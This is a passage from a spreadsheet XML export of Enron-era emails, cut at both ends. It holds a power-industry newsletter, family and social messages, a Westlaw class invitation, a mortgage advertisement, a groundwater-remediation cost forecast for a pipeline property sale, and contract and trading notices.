 a variety of mechanisms for delivery of information to power professionals=_x000D_
 including  this e-mail service, Energy Central Web Site (http://www.energy=_x000D_
central.com ), Energy Central Conference Watch? and others. We can deliver =_x000D_
your information on a promotional, subscription  or a pay-per-view basis. F=_x000D_
or more information, contact Mark Johnson at 303-782-5510  mark.johnson@ene=_x000D_
rgycentral.com )      [IMAGE]   [IMAGE]  [IMAGE] NEW CONTENT! [IMAGE]    In=_x000D_
clude the following in your Energy Central Direct:  EREN Network News  A we=_x000D_
ekly newsletter from the U.S. Department of Energy's (DOE) Energy Efficienc=_x000D_
y and Renewable Energy Network (EREN).   Latin American Power Watch  Focuse=_x000D_
d on Latin American power industry developments, including new plants and t=_x000D_
ransmission lines and political and regulatory changes.        Silicon Ener=_x000D_
gy   [IMAGE] The Structure Group   [IMAGE] Allegro Development   [IMAGE] It=_x000D_
ron   [IMAGE] KWI   [IMAGE] Excelergy   [IMAGE] Energy Solutions Plus, Inc.=_x000D_
   [IMAGE] RER   [IMAGE] LODESTAR CORPORATION   [IMAGE]   TALK TO US [IMAGE=_x000D_
]  Ideas Wanted!  We are eager to hear your ideas, feedback, and suggestion=_x000D_
s for this product.  Together we will create the most useful information to=_x000D_
ol for the electric power industry.   Partners Wanted!  Reach over 25,000 e=_x000D_
lectric power professionals with your news, analysis,  commentary or insigh=_x000D_
t into the industry. Call Mark Johnson at 303-782-5510       ELECTRIC POWER=_x000D_
 NEWS - TOP STORIES [IMAGE] [IMAGE]  Energy Central's editors have selected=_x000D_
 these as the top stories of the day:    Big power-price swings seen in sto=_x000D_
re for Ontario  By Ian McKinnon, CALGARY, Alberta, Jan 11 (Reuters) Enron C=_x000D_
hooses Swiss Investment Bank's Bid on Its Trading Operations  By Tom Fowler=_x000D_
, Houston Chronicle, Jan. 12 Plans to drop power projects worry San Francis=_x000D_
co  By Leonard Anderson, SAN FRANCISCO, Jan 11 (Reuters) Virginia Prepares =_x000D_
for Deregulation of Electricity Market  By Greg Edwards, Richmond Times-Dis=_x000D_
patch, Va., Jan. 12    Advertisement RERs Short-Term Load Forecasting Syste=_x000D_
ms      ELECTRIC POWER NEWS - MOST REQUESTED [IMAGE] [IMAGE]  These stories=_x000D_
 have been most requested by Energy Central members in the last two weeks. =_x000D_
   Energy companies cutting plant construction -WSJ     NEW YORK, Jan 4 (Re=_x000D_
uters)  Texas to launch electricity deregulation      By JIM FORSYTH, AUSTI=_x000D_
N, Texas, Dec 31, 2001 (United Press International via COMTEX) --  U.S. PPL=_x000D_
 cancels power projects, cuts forecast     NEW YORK, Jan 4 (Reuters) -  Enr=_x000D_
on Begins to Bail on Retail Contracts; California Customers Not Yet Cut    =_x000D_
 Jan. 7 (California Energy Markets)  Texas Utility Surrenders Claim on Bill=_x000D_
ions of Dollars     By R.A. Dyer, Fort Worth Star-Telegram, Texas, Dec. 29 =_x000D_
   Advertisement OPEC Trial      GAS INDUSTRY NEWS - TOP STORIES [IMAGE] [I=_x000D_
MAGE]  Energy Central's editors have selected these as the top stories of t=_x000D_
he </t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 01:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: michael's schedule</t>
  </si>
  <si>
    <t xml:space="preserve">It would probably be easier if Paige picked him up at the CC, don't you think?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 12/14/2000 09:22:15 AM_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
To: "C. Kay Mann (E-mail)" &lt;Kay.Mann@Enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: michael's schedule_x000D_
_x000D_
Michael's class party is tomorrow at 2:15 followed at 3:15 by the gym class_x000D_
party._x000D_
_x000D_
Next Wednesday school is out at 11:30 and he should be picked up in the car_x000D_
pool line. The Children's Center is open until 6pm that day if needed._x000D_
_x000D_
Thanks for taking care of me last night and this morning._x000D_
_x000D_
Love, Neil_x000D_
_x000D_
I forgot to write a check for the Astros tickets last night. Do you want to_x000D_
write it and get it over to John?  Twenty games would be $2,377.20._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 05:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paulette.obrecht@enron.com', 'cheryl.kondo@enron.com', 'mathew.martinez@enron.com', 'janice.moore@enron.com', 'robert.vote@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'becky.stephens@enron.com', 'linda.simmons@enron.com', 'steve.mccarrel@enron.com', 'susan.scott@enron.com', 'chris.dalton@enron.com', 'bonnie.nelson@enron.com', 'paul.puchot@enron.com', 'cindy.richardson@enron.com', 'richard.sanders@enron.com', 'brenda.funk@enron.com', 'andrew.wu@enron.com', 'becky.zikes@enron.com', 'christina.finelli@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'stephanie.panus@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'kim.collins@enron.com', 'candy.willard@enron.com', 'mark.greenberg@enron.com', 'stephanie.truss@enron.com', 'gerald.nemec@enron.com', 'angela.villagomez@enron.com', 'sara.shackleton@enron.com', 'dorothy.mccoppin@enron.com', 'rex.rogers@enron.com', 'james.grace@enron.com', 'leslie.linares@enron.com', 'robbi.rossi@enron.com', 'kelly.higgason@enron.com', 'deborah.culver@enron.com', 'robert.williams@enron.com', 'randy.pais@enron.com', 'mary.martinez@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'kristina.mordaunt@enron.com', 'deborah.asmus@enron.com', 'lauren.hagerty@enron.com', 'kimberlee.bennick@enron.com', 'frazier.king@enron.com', 'kathy.siess@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'majed.nachawati@enron.com', 'mary.cook@enron.com', 'linda.trevino@enron.com', 'lance.schuler-legal@enron.com', 'elisa.donovan@enron.com', 'david.nutt@enron.com', 'sandi.braband@enron.com', 'janet.cones@enron.com', 'philip.crowley@enron.com', 'elizabeth.labanowski@enron.com', 'taffy.milligan@enron.com', 'john.novak@enron.com', 'cheryl.lindeman@enron.com', 'roseann.engeldorf@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'eileen.kisluk@enron.com', 'britt.davis@enron.com', 'sheila.tweed@enron.com', 'lisa.robichaux@enron.com', 'coralina.rivera@enron.com', 'diane.goode@enron.com', 'janet.moore@enron.com', 'louis.soldano@enron.com', 'barbara.gray@enron.com', 'edwin.essandoh@enron.com', 'daniel.rogers@enron.com', 'kriste.sullivan@enron.com', 'mark.haedicke@enron.com', 'melba.trevino@enron.com', 'claudia.santos@enron.com', 'dan.hyvl@enron.com', 'shelley.corman@enron.com', 'jordan.mintz@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'paula.craft@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'richard.jeffrey@enron.com', 'connie.castillo@enron.com', 'vicki.sharp@enron.com', 'barbara.hankins@enron.com', 'julia.chin@enron.com', 'bonnie.white@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'richard.freed@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'gina.karathanos@enron.com', 'sharon.butcher@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'jan.cobden@enron.com', 'charles.cheek@enron.com', 'jim.armogida@enron.com', 'nancy.corbet@enron.com', 'jeffrey.hodge@enron.com', 'betsy.raybon@enron.com', 'rob.walls@enron.com', 'cecelia.bentz@enron.com', 'clement.abrams@enron.com', 'sarah.bruck@enron.com', 'peggy.banczak@enron.com', 'cynthia.harkness@enron.com', 'becky.spencer@enron.com', 'kim.wilkie@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'karen.cordova@enron.com', 'barton.clark@enron.com', 'carol.essig@enron.com', 'laurie.mayer@enron.com', 'tanja.murray@enron.com', 'gail.brownfeld@enron.com', 'angela.davis@enron.com', 'mike.smith@enron.com', 'stacy.dickson@enron.com', 'james.keller@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'andrew.ralston@enron.com', 'tracy.cooper@enron.com', 'mark.holsworth@enron.com', 'joya.williams@enron.com', 'darlene.forsyth@enron.com', 'gil.melman@enron.com', 'reginald.shanks@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'eric.merten@enron.com', 'sharon.morgan@enron.com', 'jan.cooley@enron.com', 'holly.keiser@enron.com', 'peter.vecchio@enron.com', 'robert.eickenroht@enron.com', 'nora.dobin@enron.com', 'robert.george@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'tracy.carter@enron.com', 'joel.ephross@enron.com', 'janet.butler@enron.com', 'travis.mccullough@enron.com', 'nancy.muchmore@enron.com', 'robin.jordan@enron.com', 'karen.jones@enron.com', 'lee.carrier@enron.com', 'david.grant@enron.com', 'claudia.meraz@enron.com', 'wyndel.mcnamara@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'mary.oscar@enron.com', 'michelle.hicks@enron.com', 'eddy.daniels@enron.com', 'iris.waser@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'andrew.edison@enron.com', 'martha.braddy@enron.com', 'ava.syon@enron.com', 'sarah.dietrich@enron.com', 'ann.white@enron.com', 'ann.ballard@enron.com', 'michelle.lawless@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'drew.fossum@enron.com', 'colleen.raker@enron.com', 'ned.crady@enron.com', 'jennifer.hillegonds@enron.com', 'john.viverito@enron.com', 'sara.davidson@enron.com', 'dan.lyons@enron.com', 'limor.nissan@enron.com', 'shari.stack@enron.com', 'susan.bulgawicz@enron.com', 'ruth.mann@enron.com', 'gareth.bahlmann@enron.com', 'mary.heinitz@enron.com', 'frank.sayre@enron.com', 'rita.bahner@enron.com', 'marie.heard@enron.com', 'michelle.blaine@enron.com', 'robin.hill@enron.com', 'susan.wheeler@enron.com', 'melinda.winn@enron.com', 'tana.jones@enron.com', 'kenton.erwin@enron.com', 'mary.berg@enron.com', 'sheri.cromwell@enron.com', 'carol.clair@enron.com', 'margaret.doucette@enron.com', 'tony.pryor@enron.com', 'dina.snow@enron.com', 'marianne.castano@enron.com', 'robert.bruce@enron.com', 'john.schwartzenburg@enron.com', 'gay.arnold@enron.com', 'david.koogler@enron.com', 'kymitra.fisher@enron.com'})</t>
  </si>
  <si>
    <t>Free Westlaw Classes at Enron EB48C2  9:15 - 1:30 Thursday, 5/31</t>
  </si>
  <si>
    <t xml:space="preserve">You are cordially invited to attand three Westlaw classes at EB48C2 on _x000D_
Thursday, 5/31 to learn new features, shortcuts and tips, and enhanced Public _x000D_
Records on westlaw.com from a custom page on our legal portal _x000D_
http://legaledge.corp.enron.com/ .  Classes will be given by Michael _x000D_
Springer, Westlaw Attorney. Lunch will be provided by Westlaw.  Please _x000D_
R.S.V.P. to Sylvia Hu x 36775 sylvia.hu@enron.com by Wed. 5/30.  _x000D_
_x000D_
_x000D_
Free On-Site Training_x000D_
for_x000D_
Enron Legal_x000D_
Where:  Conference Room EB48C2_x000D_
When:  Thursday, May 31st_x000D_
_x000D_
Class Schedule:_x000D_
_x000D_
9:15 to 10:30 - Westlaw.com Functionality_x000D_
learn shortcuts, tips, and tricks, to improve efficiency and accuracy_x000D_
_x000D_
10:45 to 12:00 - Public Records Enhancements_x000D_
see recent improvements in coverage and search-ability_x000D_
_x000D_
12:15 to 1:30 - New Features on Westlaw.com_x000D_
experience enhancements such as Table of Contents, Most Cited Cases, and _x000D_
KeySearch - the Digests on Westlaw_x000D_
_x000D_
These valuable research tools will be demonstrated by:_x000D_
Michael C. Springer, JD/MBA_x000D_
Westlaw Corporate Account Manager_x000D_
_x000D_
Lunch will be provided by Westlaw._x000D_
_x000D_
Please RSVP to Sylvia Hu @ Sylvia_Hu@enron.com, or call 713-853-6775 before _x000D_
Wed. 5/30. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 15:41:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'420827.86477310.2@1.americanexpress.com'})</t>
  </si>
  <si>
    <t>Mortgages From American Express - Best Price Guaranteed!</t>
  </si>
  <si>
    <t>[IMAGE]_x000D_
Dear American Express Customer:_x000D_
Whether you are making a purchase or refinancing, with_x000D_
Mortgages from American Express* you'll get:_x000D_
-  Best Price Guarantee_x000D_
   You will receive the best price guaranteed - or you receive_x000D_
   $250.**_x000D_
-   Same Day Loan Decision_x000D_
    It's easy to get a loan decision in minutes._x000D_
-   Personalized Customer Service_x000D_
    A fast and smooth application process,_x000D_
    and a dedicated mortgage counselor to guide you _x000D_
    from approval to closing._x000D_
Call or log on today._x000D_
(800) AXP-1008http://www.americanexpress.com/mortgages?aexp_em=MORTG1101 *All residential mortgage loans and related services are offered_x000D_
and provided by and through PHH Mortgage Services.  American_x000D_
Express does not solicit, offer, endorse, negotiate, or originate_x000D_
any mortgage loan products, and is neither a licensed mortgage_x000D_
broker nor a licensed mortgage lender. Financing provided by PHH_x000D_
Mortgage Services, 3000 Leadenhall Road, Mt. Laurel, NJ 08054._x000D_
Arizona Residential Mortgage Licensee #BK BR 0016981; Licensed_x000D_
by the Department of Corporations under the California Residential_x000D_
Mortgage Lending Act, Georgia Residential Mortgage Licensee;_x000D_
Illinois Residential Mortgage Licensee; Massachusetts Licensed_x000D_
Lender #ML1653; New Hampshire First Mortgage Banker #5625-MB_x000D_
&amp; Second Mortgage Home Lender #5626-MHL; Licensed by the N.J._x000D_
Department of Banking and Insurance; Licensed Mortgage Banker -_x000D_
NYS Banking Department; Rhode Island Licensed Lender; Minnesota_x000D_
- This is not an offer to enter an interest rate lock-in agreement._x000D_
Licensed First Mortgage Banker and Secondary Mortgage Lender by_x000D_
Pennsylvania Department of Banking. PHH Mortgage Services is an_x000D_
Equal Housing Lender._x000D_
**A customer must provide a complete, system generated Good Faith_x000D_
Estimate, listing a specific lender's name, that is dated the same_x000D_
day as the rate quoted by us. If such Good Faith Estimate indicates a_x000D_
lower interest rate than  our rate, inclusive of points and loan_x000D_
fees, for the same loan program that is offered by us and we have _x000D_
verified the accuracy of the rate and fees listed then we will have _x000D_
the option of beating that lender's total loan costs by $100 or _x000D_
paying the customer $250 ($500 for properties located in California) _x000D_
when they close with that lender and provide us with a copy of the _x000D_
signed Note and Final HUD-1 Settlement Statement._x000D_
P.S. This e-mail was sent to KPRESTO@ENRON.COM.  If you received_x000D_
this e-mail at a different address, this e-mail message was_x000D_
forwarded.  If you do not wish to receive future e-mail offers from_x000D_
American Express, please hit the reply button and let us know by_x000D_
typing the word "REMOVE" and indicate this e-mail address in the_x000D_
subject line._x000D_
Please visit the American Express Privacy Statement athttp://www.americanexpress.com/privacy?aexp_em=MORTG1102   to set,_x000D_
review or change preferences regarding the type of e-mails you want_x000D_
to receive. _x000D_
Copyright 2001. American Express Company.  All Rights Reserved.</t>
  </si>
  <si>
    <t>Fri, 29 Dec 2000 00:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chi325@hotmail.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">what are you guys doing for new year's?_x000D_
_x000D_
work 713.853.9351_x000D_
home 713.777.0146_x000D_
pager 800.963.0942_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 01:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stadogb@email.msn.com'})</t>
  </si>
  <si>
    <t>Re: how have you been stranger???/</t>
  </si>
  <si>
    <t xml:space="preserve">call me b/c i will forget.  i will even pay for the call.  just call and then _x000D_
i will call you back.  i forget at night.  i have a lot on my mind.  </t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 07:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Gomez PSA</t>
  </si>
  <si>
    <t xml:space="preserve">Lou-_x000D_
I think the previous numbers are a bit low now. In December, 1999, we _x000D_
installed four downgradient monitor wells on off-site property owned by the _x000D_
Nature Conservancy. Samples from these wells confirm a contaminant plume of _x000D_
arsenic in the shallow groundwater emanating from the release area. Another _x000D_
development is the recent accumulation of product in some of our recovery _x000D_
wells that is different in characteristic from what we were previously _x000D_
dealing with. This indicates that we are possibly pulling in product from _x000D_
another source that we have not yet identified (although I suspect a nearby _x000D_
sump location as the culprit). We have another drilling program in the works _x000D_
for this year to further delineate the downgradient extent of the arsenic _x000D_
plume and to evaluate the other potential source of accumulated product. This _x000D_
work is tentatively scheduled for the latter part of August or September. _x000D_
Please let me know if this schedule should be accelerated or deferred due to _x000D_
a pending sale agreement. Another consideration related to off-site _x000D_
contamination, the Railroad Commission has not yet requested that NNG notify _x000D_
affected property owners, but I suspect that such a request is forthcoming. I _x000D_
am in the process of preparing a letter, addressed to you, identifying the _x000D_
affected property located between the facility and the Nature Conservancy _x000D_
property. _x000D_
_x000D_
In light of these considerations and the continued interest by the Railroad _x000D_
Commission, I have adjusted the spending forecast as follows:_x000D_
2000    $100k_x000D_
2001    $100k_x000D_
2002    $60k_x000D_
2003    $20k_x000D_
2004    $20k_x000D_
2005+  $20k_x000D_
Total   $320,000+_x000D_
Notes regarding this forecast:_x000D_
1) This should be viewed as an optimistic forecast (i.e., if everything goes _x000D_
fairly well)._x000D_
2) No $ are included in this forecast for managing off-site property issues _x000D_
that may arise._x000D_
3) Assumes that a second source area is confirmed and additional recovery _x000D_
wells will be installed next year to recover PSH from this area. _x000D_
4) Assumes that the existing recovery system will be adequate for continued _x000D_
operations._x000D_
5) Assumes that the recovery system continues to operate through 2002._x000D_
6) Assumes that the Railroad Commission will continue to renew the minor _x000D_
permit for disposal of recovered liquids._x000D_
7) Assumes that quarterly groundwater sampling will continue at least through _x000D_
2005._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
07/17/2000 05:58 PM_x000D_
Louis Soldano_x000D_
Louis Soldano_x000D_
Louis Soldano_x000D_
07/17/2000 05:58 PM_x000D_
07/17/2000 05:58 PM_x000D_
To: lsoldano@wt.net, George Robinson/OTS/Enron@ENRON, Stephen _x000D_
Herber/ET&amp;S/Enron@ENRON, Kim Wilkie/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Gomez PSA_x000D_
_x000D_
george - how would you value to the GW problem at Gomez??  I took a look at _x000D_
some old notes (Oct 1999) and we had the following:_x000D_
_x000D_
2000    $80k_x000D_
2001    $30K_x000D_
2002    $20k_x000D_
_x000D_
_x000D_
what do you think???_x000D_
_x000D_
---------------------- Forwarded by Louis Soldano/ET&amp;S/Enron on 07/17/2000 _x000D_
05:53 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kim Wilkie                           07/17/2000 04:49 PM_x000D_
	_x000D_
_x000D_
To: Stephen Herber/ET&amp;S/Enron@ENRON_x000D_
cc: Louis Soldano/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Gomez PSA_x000D_
_x000D_
Steve, after talking to Lou, we have a couple of choices:  (1) you could tell _x000D_
them that they have to assume the groundwater problem (based on the value of _x000D_
the property, do you think they priced it into their offer?), (2) we can _x000D_
specifically retain the groundwater issue as we previously discussed or (3) _x000D_
we can remain silent on the issue and assume that they will include it in _x000D_
their environmental compliance report ( the only problem with this choice is _x000D_
that they have a termination right if title defects plus environmental _x000D_
compliance issues exceed 5.0% of the purchase price - basically this would _x000D_
give them a free out since this is probably a $250,000 problem that they _x000D_
already know about).   The attached draft assumes you will choose (2) since _x000D_
that is what we have been discussing all along.  _x000D_
_x000D_
Please call me if you have any questions.  As I mentioned on your voicemail, _x000D_
I have an appointment out of the office in the morning and may or may not _x000D_
work out of the house after that.   Regardless, I will have the document with _x000D_
me and can talk it over with you or make changes as you see appropriate.  My _x000D_
number at home is 713-664-7472._x000D_
_x000D_
Thanks, Kim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 13:50:57 -0800 (PST)</t>
  </si>
  <si>
    <t>i knew that was coming before you sent it.  you are so predicable.  didn't get your way and pouting again._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 3:50 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
bye_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 3:49 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i am not going to replay a drunken conversation with you.  you will have to remember on your own._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 3:48 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
whats not the same_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 3:48 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
what are you talking about?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 3:47 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	_x000D_
_x000D_
i cant figure out what i meant</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 11:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rlevine@fce.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'heather.kroll@enron.com', 'stephen.plauche@enron.com', 'scott.healy@enron.com'})</t>
  </si>
  <si>
    <t>purchase contract markup</t>
  </si>
  <si>
    <t>Heather, Scott, Kay, Stephen:_x000D_
_x000D_
The attached file is a redlined markup of your draft purchase contract_x000D_
prepared by our outside counsel, with a few added comments from our group._x000D_
Please note these comments are intended to be preliminary and non-binding,_x000D_
for discussion only. Most of these comments don't address the scope of our_x000D_
meeting today, but are more detail oriented. Please call me if you have any_x000D_
questions before we meet Wednesday._x000D_
_x000D_
 &lt;&lt;RMLredline version 2.doc&gt;&gt;_x000D_
_x000D_
Ross M. Levine, Esq._x000D_
Director of Contracts and Contracts Counsel_x000D_
FuelCell Energy, Inc._x000D_
3 Great Pasture Rd._x000D_
Danbury, CT 06813_x000D_
_x000D_
(203) 825-6057_x000D_
(203) 798-2945 (fax)_x000D_
rlevine@fce.com (email)_x000D_
_x000D_
This transmittal and its attached files (if any) may contain proprietary or_x000D_
confidential information belonging to FuelCell Energy, Inc. If you are not_x000D_
the intended recipient, you are hereby notified that you have received this_x000D_
transmittal in error. Any review, disclosure, use, dissemination,_x000D_
distribution or copying of this information is strictly prohibited. If you_x000D_
suspect that you have received this communication in error, please notify us_x000D_
immediately by telephone at 1-(203) 825-6000, or e-mail at jryan@fce.com and_x000D_
immediately delete this message and all its attachments._x000D_
_x000D_
_x000D_
 - RMLredline version 2.doc</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>BRC Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Bob:  Would you please handle?  Thanks.  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 11/16/2000 12:35 PM -----_x000D_
_x000D_
	Sheila Glover_x000D_
	11/16/2000 11:36 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron_x000D_
		 cc: William Patrick Lewis/HOU/ECT@ECT_x000D_
		 Subject: BRC Contracts_x000D_
_x000D_
Sara, _x000D_
Please review the consulting agreement.  We need ASAP.  We are still agreeing _x000D_
to what will be performed regarding the engagement letter._x000D_
Thanks._x000D_
Sheila_x000D_
---------------------- Forwarded by Sheila Glover/HOU/ECT on 11/16/2000 11:34 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  William Patrick Lewis                           11/15/2000 08:38 AM_x000D_
	_x000D_
_x000D_
To: Sheila Glover/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: BRC Contracts_x000D_
_x000D_
_x000D_
---------------------- Forwarded by William Patrick Lewis/HOU/ECT on _x000D_
11/15/2000 07:29 AM ---------------------------_x000D_
_x000D_
_x000D_
Donna Zaleski &lt;donna.zaleski@barra.com&gt; on 11/14/2000 02:05:01 PM_x000D_
To: "'william.patrick.lewis@enron.com'" &lt;william.patrick.lewis@enron.com&gt;_x000D_
cc: David Katz &lt;david.katz@barra.com&gt; _x000D_
Subject: BRC Contracts_x000D_
_x000D_
_x000D_
Per your request to David Katz, attached is BARRA RogersCasey's standard_x000D_
Consulting Agreement and sample Engagement Contract._x000D_
_x000D_
Please call David at 203-656-5992 if you have any questions._x000D_
_x000D_
 &lt;&lt;BRC Consulting 991201.pdf&gt;&gt;  &lt;&lt;BRC FFEC (Ongoing) 980529.pdf&gt;&gt;_x000D_
_x000D_
 - BRC Consulting 991201.pdf_x000D_
 - BRC FFEC (Ongoing) 980529.pdf_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 08:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>Tim's Birthday</t>
  </si>
  <si>
    <t xml:space="preserve">We are meeting at Chuy's at 7:00 tonight to celebrate Tim's 30th Birthday!_x000D_
Be there or be square_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 06:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mrobert@enron.com'})</t>
  </si>
  <si>
    <t>ROBERTS JR,MICHAEL A  has suggested reviewers and submitted them for your _x000D_
approval.  You may review/modify this list of reviewers by logging on to PEP _x000D_
at http://pep.corp.enron.com  and going to Supervisor Services.  Please _x000D_
remember, no feedback can be completed on ROBERTS JR,MICHAEL A  until you _x000D_
have approved the list.</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 22:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.guzman@enron.com', 'jesse.bryson@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">AZPS is infamous for changing their requirements on tags.  So is SRP.  Just _x000D_
do what you need to do to get your tags implemented.  Until the standards are _x000D_
published, the Control Areas are god.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Cara Semperger/PDX/ECT@ECT_x000D_
cc: Jesse Bryson/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
Becky at APS turned down a tag for me last night for HE 4MST that we have _x000D_
been using for several weeks without a problem.  The tag number is 18594.  _x000D_
Tis was a sale from EPE to PNM at 4C.  She turned it down saying that EPE is _x000D_
not a control area at 4C and that PNM should be in the CA for the first _x000D_
line.  I argued with her about it for quite a while but she insisted that it _x000D_
was wrong.  Could you please take a look at this and tell me if she is wrong. _x000D_
Thank you. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>(00-403) Spot Month Procedures for Gold, Silver, Copper, and_x000D_
 Aluminum</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 00-403_x000D_
November 27, 2000_x000D_
_x000D_
TO:_x000D_
All COMEX Members/Member Firms_x000D_
All COMEX Clearing Members_x000D_
All COMEX Floor Traders_x000D_
All COMEX Operations Managers_x000D_
_x000D_
FROM:_x000D_
Michael Campanelli, Vice President, Floor Operations, COMEX Division_x000D_
_x000D_
RE: Spot Month Procedures on the Eve of First Notice Day_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
-------_x000D_
_x000D_
Please be reminded that Thursday, November 30, 2000, is the First Notice Day, _x000D_
for the Gold, Silver, Copper and Aluminum futures delivery month of December _x000D_
2000 (the new spot month)._x000D_
_x000D_
On Wednesday, November 29, 2000, the Eve of the First Notice Day, all Brokers _x000D_
and Clearing Members must have a duly authorized, On-Line Trade Entry _x000D_
("OLTE") system trained representative available until such time as the _x000D_
Exchange deems necessary._x000D_
_x000D_
It is imperative that trades involving the Spot Month are processed and _x000D_
cleared properly.  Therefore, representatives are expected to make a diligent _x000D_
effort to process all Spot Month trades accurately._x000D_
_x000D_
Failure by any Clearing member or qualified Floor Trader to show due _x000D_
diligence involving Spot Month Trade processing may result in severe _x000D_
disciplinary action by the Exchange._x000D_
_x000D_
If you should have any questions, please do not hesitate to contact David _x000D_
Sherman at (212) 299-2061._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=tana.jones@enron.com&amp;refdo_x000D_
c=(00-403)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 06:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Are you "rocky mountain high" yet?</t>
  </si>
  <si>
    <t>How goes it, girlfriend? I just got your message - sorry I haven't been in _x000D_
touch yet, and I can give you all the excuses in the book about how I've been _x000D_
swamped with work, play, life in general, but we both know I'm just flaky, so _x000D_
there's no point in explaining it._x000D_
_x000D_
Anyway, I'm so excited to hear you're doing well in your new Rocky Mountain _x000D_
dwelling, but you left me here with no good pissing and moaning (and getting _x000D_
"pissed") buddies. So I checked out airfares to Denver, and found one for _x000D_
